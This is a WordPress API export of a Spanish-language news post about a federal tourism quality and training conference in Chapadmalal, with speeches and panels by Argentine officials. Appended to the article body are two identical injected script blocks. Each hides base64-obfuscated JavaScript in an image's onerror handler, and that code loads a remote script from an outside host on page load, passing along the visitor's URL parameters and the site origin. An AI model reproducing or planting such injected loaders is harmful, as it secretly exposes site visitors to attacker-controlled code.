{"id":1716,"date":"2022-11-03T11:08:42","date_gmt":"2022-11-03T14:08:42","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1716"},"modified":"2025-08-14T00:31:24","modified_gmt":"2025-08-14T03:31:24","slug":"jornadas-federales-de-calidad-y-formacion-en-chapadmalal","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1716","title":{"rendered":"Jornadas Federales de Calidad y Formaci\u00f3n en Chapadmalal"},"content":{"rendered":"\n<p><strong><em>Durante dos d\u00edas se llevan a cabo presentaciones, disertaciones y talleres que abordan diversos ejes.<\/em><\/strong><\/p>\n\n\n\n<p>Bajo el lema \u201cLos desaf\u00edos de la innovaci\u00f3n en la planificaci\u00f3n tur\u00edstica\u201d se desarrollan las Jornadas Federales de Calidad y Formaci\u00f3n organizadas por el&nbsp;<strong>Ministerio de Turismo y Deportes de la Naci\u00f3n, en conjunto con la Subsecretar\u00eda de Turismo de la Provincia de Buenos Aires<\/strong>. Participaron alrededor de&nbsp;<strong>150 personas<\/strong>, representantes del sector p\u00fablico y privado de las provincias.<\/p>\n\n\n\n<p>En la apertura estuvieron presentes la jefa de la Unidad Gabinete de Asesores,&nbsp;<strong>Geraldine Oniszczuk<\/strong>; la subsecretaria de Calidad, Accesibilidad y Sustentabilidad del Turismo Nacional,&nbsp;<strong>In\u00e9s Albergucci<\/strong>; el subsecretario de Promoci\u00f3n Tur\u00edstica y Nuevos Productos,&nbsp;<strong>Lisandro P\u00e9rez Losinno<\/strong>; y la subsecretaria de Turismo de la provincia de Buenos Aires,&nbsp;<strong>Mar\u00eda Soledad Mart\u00ednez<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/apertura.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<p>En este sentido,&nbsp;<strong>Oniszczuk<\/strong>&nbsp;afirm\u00f3:&nbsp;<em>\u201cPara nosotros es muy significativo hacer esta Jornada ac\u00e1, en las Unidades que recuperamos, porque la pol\u00edtica en materia de turismo representa a todos los sectores y buscamos unir y tender lazos entre las partes\u201d<\/em>.&nbsp;<strong>Albergucci<\/strong>&nbsp;expres\u00f3:&nbsp;<em>\u201cEsta jornada forma parte de un proceso de trabajo que venimos haciendo, de manera transversal en todo el Ministerio, para impulsar pol\u00edticas p\u00fablicas como motor de desarrollo del turismo\u201d<\/em>.<\/p>\n\n\n\n<p><strong>Losinno<\/strong>&nbsp;coment\u00f3 los avances y resultados de las exitosas ediciones de PreViaje y su impacto en la reactivaci\u00f3n del turismo en el pa\u00eds.&nbsp;<strong>Mart\u00ednez<\/strong>&nbsp;agradeci\u00f3 el trabajo conjunto que se viene realizando y las acciones para la igualdad en el acceso al turismo.<\/p>\n\n\n\n<p>A continuaci\u00f3n, las autoridades hicieron entrega de distinciones del programa \u201cBases para la gesti\u00f3n de municipios tur\u00edsticos sostenibles\u201d y \u201cDirectrices de gesti\u00f3n ambiental\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/entrega_distinciones.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<p>La primera disertaci\u00f3n estuvo a cargo del director Nacional de Calidad e Innovaci\u00f3n Tur\u00edstica,\u00a0<strong>Hern\u00e1n Roitman<\/strong>, y de la directora de Formaci\u00f3n en Turismo,\u00a0<strong>Gabriela Bar\u00f3n<\/strong>, quienes presentaron los resultados de sus direcciones.\u00a0<strong>Roitman<\/strong>\u00a0subray\u00f3 la importancia de realizar las Jornadas en Chapadmalal:\u00a0<em>\u201cSon un s\u00edmbolo del acceso universal al turismo, una piedra fundamental de nuestra gesti\u00f3n\u201d<\/em>. Destac\u00f3, entre otras cosas, la renovaci\u00f3n de la identidad del Sistema Argentino de Calidad Tur\u00edstica (SACT) que implic\u00f3 el redise\u00f1o de la marca y los manuales, y la incorporaci\u00f3n de criterios de accesibilidad y sostenibilidad en la producci\u00f3n. Adem\u00e1s, se crearon nuevos sellos, directrices y programas, aumentando el alcance de los mismos y su federalizaci\u00f3n, llegando a todas las provincias y 100 localidades.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/roitman_y_baron.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Luego, del Conversatorio: Innovaci\u00f3n tur\u00edstica en el sector privado participaron\u00a0<strong>Gabriela Ferruci<\/strong>, de la Asociaci\u00f3n de Hoteles de Turismo de la Rep\u00fablica Argentina (AHT);\u00a0<strong>Cristina Oddone<\/strong>, de la Federaci\u00f3n Empresaria Hotelera Gastron\u00f3mica de la Rep\u00fablica Argentina (FEHGRA); y\u00a0<strong>Mat\u00edas Sket<\/strong>, de la Asociaci\u00f3n Argentina de Organizadores y Proveedores de Exposiciones, Congresos, Eventos y Bur\u00f3s de Convenciones (AOCA) quienes contaron sus experiencias implementando programas y pr\u00e1cticas de innovaci\u00f3n, capacitaci\u00f3n, profesionalizaci\u00f3n y certificaci\u00f3n en sus entidades.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/conversatorio.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Tambi\u00e9n hubo una presentaci\u00f3n sobre\u00a0<a href=\"https:\/\/larutanatural.gob.ar\/\">La Ruta Natural<\/a>\u00a0a cargo de la directora de Desarrollo de Turismo de Naturaleza,\u00a0<strong>Mariana P\u00e9rez M\u00e1rquez<\/strong>, quien abord\u00f3 el trabajo que se est\u00e1 llevando adelante para preparar los destinos de Argentina desde el punto de vista de la naturaleza, en t\u00e9rminos de desarrollo y promoci\u00f3n. Se busca fortalecer la oferta tur\u00edstica de los territorios, no solo de los consolidados sino tambi\u00e9n los emergentes, en l\u00ednea con el enfoque de la tendencia de mercado a nivel mundial. Dio detalles sobre la infraestructura, inversi\u00f3n y desarrollo de las rutas y de\u00a0<a href=\"https:\/\/www.argentina.gob.ar\/turismoydeportes\/50-destinos\">50 Destinos<\/a>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/perez_marquez.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Despu\u00e9s,\u00a0<strong>Roitman<\/strong>\u00a0y el director Nacional de Agencias de Viajes,\u00a0<strong>Mart\u00edn Antoniucci<\/strong>, hicieron una presentaci\u00f3n sobre el plan de trabajo de las Agencias, que implica la renovaci\u00f3n normativa, transparencia, digitalizaci\u00f3n, gesti\u00f3n de calidad, capacitaciones, control y fiscalizaci\u00f3n. Adem\u00e1s, se presentaron los avances para crear el Sello Agencias, que busca promover la profesionalizaci\u00f3n del sector mediante la mejora continua de sus servicios, como as\u00ed tambi\u00e9n la credibilidad y confianza de las agencias.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/roitman_y_antoniucci.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<p>En el panel de N\u00f3mades digitales disert\u00f3 el director de Promoci\u00f3n del Instituto Nacional de Promoci\u00f3n Tur\u00edstica (INPROTUR),\u00a0<strong>Hern\u00e1n Vanoli<\/strong>; junto con\u00a0<strong>Agustina Carman<\/strong>, coordinadora de Promoci\u00f3n;\u00a0<strong>Ana Clara Azcurra<\/strong>, de Comunicaci\u00f3n Digital; y\u00a0<strong>Natalia Cardozo<\/strong>, referente del SACT. Explicaron el trabajo que se est\u00e1 haciendo para lanzar el Sello N\u00f3mades Digitales, y el posicionamiento de Argentina como destino de oportunidades, que se destaca por la tecnolog\u00eda, la salud, la educaci\u00f3n y la conectividad, entre otras.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/nomades_digitales.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>La siguiente presentaci\u00f3n fue sobre pr\u00e1cticas profesionalizantes y la brind\u00f3\u00a0<strong>Mart\u00edn Calissano<\/strong>, coordinador del Programa de Inserci\u00f3n Laboral, quien habl\u00f3 sobre el trabajo de articulaci\u00f3n interministerial y con el sector privado para visibilizar el turismo como un sector con opciones laborales y de capacitaci\u00f3n.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/calissano.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Por \u00faltimo, la disertaci\u00f3n de Enoturismo estuvo a cargo del director Nacional de Planificaci\u00f3n y Desarrollo,\u00a0<strong>Sergio Castro<\/strong>; de la directora Nacional de Fiestas Nacionales y Eventos,\u00a0<strong>Fernanda Rodr\u00edguez<\/strong>; del director\u00a0<strong>Roitman<\/strong>; y como invitado,\u00a0<strong>Agust\u00edn Vidal<\/strong>, director de la pel\u00edcula \u201cEl camino del vino\u201d, quien coment\u00f3 el proceso de filmaci\u00f3n y su relaci\u00f3n con el enoturismo.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/enoturismo.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Las autoridades explicaron el trabajo que se est\u00e1 llevando adelante con respecto al enoturismo, la ampliaci\u00f3n hacia m\u00e1s provincias argentinas, y la importancia de entender el contexto y la diversidad como aspectos claves del desarrollo. Asimismo, generar impacto positivo en las comunidades, en el turismo rural, que permita arraigo local. Tambi\u00e9n, el vino no solo como bebida nacional, sino como un producto que moviliza eventos y celebraciones a lo largo y ancho del pa\u00eds.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/publico.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<p>La Jornadas contin\u00faan el d\u00eda martes, con entrega de distinciones del Sello Formar, diversos talleres de gesti\u00f3n, planificaci\u00f3n y comunicaci\u00f3n, y una visita guiada por las instalaciones de la Unidad Tur\u00edstica, as\u00ed como actividades recreativas previas al cierre de las Jornadas.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Durante dos d\u00edas se llevan a cabo presentaciones, disertaciones y talleres que abordan diversos ejes. Bajo el lema \u201cLos desaf\u00edos de la innovaci\u00f3n en la planificaci\u00f3n tur\u00edstica\u201d se desarrollan las Jornadas Federales de Calidad y Formaci\u00f3n organizadas por el&nbsp;Ministerio de Turismo y Deportes de la Naci\u00f3n, en conjunto con la Subsecretar\u00eda de Turismo de la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1717,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,21],"tags":[],"class_list":{"0":"post-1716","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1716"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1716"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1716\/revisions"}],"predecessor-version":[{"id":7292,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1716\/revisions\/7292"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1717"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1716"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1716"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1716"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}